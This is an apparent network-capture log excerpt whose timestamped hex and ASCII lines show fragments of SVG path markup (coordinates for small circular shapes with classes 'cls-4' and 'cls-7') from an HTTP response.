                                                                                                                                                                                                                                                                                        2023-05-31 12:52:07 UTC5673INData Raw: 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2e 35 2c 32 39 32 2e 38 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 37 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2e 32 37 2c 32 38 35 2e 39 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e
                                                                                                                                                                                                                                                                                        Data Ascii: cls-4" d="M879.5,292.83a1.72,1.72,0,0,1-.77,2.24,2.52,2.52,0,0,1-3.34-.94,2.41,2.41,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M879.27,285.9a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:07 UTC5689INData Raw: 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 31 30 2c 33 36 31 2e 32 31 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 30 39 2e 37 39 2c 33 35 34 2e 32 38 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 33
                                                                                                                                                                                                                                                                                        Data Ascii: 2.86"/><path class="cls-4" d="M910,361.21a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"/><path class="cls-4" d="M909.79,354.28a1.71,1.71,0,0,1-.78,2.23,2.5,2.5,0,0,1-3.33-.94,2.3
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:07 UTC5705INData Raw: 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 36 2e 39 34 2c 32 33 35 2e 37 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 36 2e 37 2c 32 32 38 2e 37 36 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32
                                                                                                                                                                                                                                                                                        Data Ascii: 9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M926.94,235.7a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"/><path class="cls-4" d="M926.7,228.76a1.72,1.72,0,0,1-.78,2.24,2
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:07 UTC5721INData Raw: 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 32 37 2e 31 31 2c 31 37 30 2e 35 37 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 32 37 2e 33 34 2c 31 37 37 2e 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 39 2c 32
                                                                                                                                                                                                                                                                                        Data Ascii: 82"/><path class="cls-4" d="M1027.11,170.57a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"/><path class="cls-4" d="M1027.34,177.4a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.92,2.39,2
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:07 UTC5737INData Raw: 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 31 30 2e 36 39 2c 33 30 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 39 37 2e 35 31 2c 31 31 36 2e 38 38 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33
                                                                                                                                                                                                                                                                                        Data Ascii: -.16-2.81"/><path class="cls-4" d="M1010.69,301a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"/><path class="cls-4" d="M997.51,116.88a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.3
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:07 UTC5753INData Raw: 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 38 31 2e 30 39 2c 32 34 37 2e 33 32 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 38 31
                                                                                                                                                                                                                                                                                        Data Ascii: .37,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"/><path class="cls-4" d="M981.09,247.32a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.51,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"/><path class="cls-4" d="M981
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:07 UTC5769INData Raw: 2c 31 38 36 2e 38 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 35 31 2e 34 39 2c 31 39 33 2e 36 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e
                                                                                                                                                                                                                                                                                        Data Ascii: ,186.81a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.51,2.84,2.22,2.22,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"/><path class="cls-4" d="M951.49,193.64a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.92,2.39,2.39,0,0,1-.5,2.85,2.23,2.23,0,0,1-2.
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:07 UTC5785INData Raw: 30 2c 31 2d 32 2e 38 36 2c 30 41 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2c 39 32 32 2c 31 32 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 31 2e 36 37 2c 31 33 33 2e 31 32 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 31 2e 39 2c 31 34 30 61 31 2e 36 38 2c 31 2e 36 38 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e
                                                                                                                                                                                                                                                                                        Data Ascii: 0,1-2.86,0A2.09,2.09,0,0,1,922,125"/><path class="cls-4" d="M921.67,133.12a1.69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.1,2.1,0,0,1-.15-2.82"/><path class="cls-4" d="M921.9,140a1.68,1.68,0,0,1,.76-2.2,2.
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:07 UTC5801INData Raw: 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 30 35 2e 34 37 2c 32 37 30 2e 33 39 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 41 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2c 39 30 39 2c 32 37 32 61 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c
                                                                                                                                                                                                                                                                                        Data Ascii: 48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.5,2.84,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.82"/><path class="cls-4" d="M905.47,270.39a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.29.93A2.38,2.38,0,0,1,909,272a2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:07 UTC5817INData Raw: 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 35 2e 36 35 2c 32 30 39 2e 38 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 35 2e 38 38 2c 32 31 36 2e 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d
                                                                                                                                                                                                                                                                                        Data Ascii: class="cls-4" d="M875.65,209.87a1.69,1.69,0,0,1,.76-2.2,2.49,2.49,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><path class="cls-4" d="M875.88,216.7a1.69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:07 UTC5833INData Raw: 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 36 2e 30 35 2c 31 35 36 2e 31 39 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22
                                                                                                                                                                                                                                                                                        Data Ascii: 36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"/><path class="cls-4" d="M846.05,156.19a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.16-2.81"/><path class="cls-4" d="
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:07 UTC5849INData Raw: 2c 32 38 36 2e 36 33 61 31 2e 36 38 2c 31 2e 36 38 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 32 39 2e 38 36 2c 32 39 33 2e 34 35 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32
                                                                                                                                                                                                                                                                                        Data Ascii: ,286.63a1.68,1.68,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.92,2.37,2.37,0,0,1-.5,2.85,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><path class="cls-4" d="M829.86,293.45a1.7,1.7,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.21,2.21,0,0,1-2
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:07 UTC5865INData Raw: 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 30 2c 32 33 32 2e 39 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 30 2e 32 36 2c 32 33 39 2e 37 37 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39
                                                                                                                                                                                                                                                                                        Data Ascii: ,0,0,1-.16-2.81"/><path class="cls-4" d="M800,232.94a1.7,1.7,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"/><path class="cls-4" d="M800.26,239.77a1.7,1.7,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.9
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:07 UTC5881INData Raw: 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 30 35 2c 32 32 39 2e 32 35 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 30 34 2e 37 33 2c 32 32 31 2e 35 33 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39
                                                                                                                                                                                                                                                                                        Data Ascii: 37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M505,229.25a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M504.73,221.53a1.92,1.92,0,0,1-.87,2.49,2.79,2.79
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:07 UTC5897INData Raw: 3d 22 4d 35 32 33 2e 38 31 2c 38 39 2e 35 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 32 33 2e 35 35 2c 38 31 2e 38 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e
                                                                                                                                                                                                                                                                                        Data Ascii: ="M523.81,89.56a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M523.55,81.84a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:08 UTC5913INData Raw: 2e 36 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 35 37 2e 35 32 2c 31 35 37 2e 39 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33
                                                                                                                                                                                                                                                                                        Data Ascii: .66a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M557.52,157.94a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:08 UTC5929INData Raw: 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 31 2e 34 39 2c 32 33 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 38 2c 32 2e 37 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61
                                                                                                                                                                                                                                                                                        Data Ascii: 9,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.17"/><path class="cls-7" d="M591.49,234a1.92,1.92,0,0,1-.87,2.49,2.78,2.78,0,0,1-3.71-1.05,2.67,2.67,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><pa
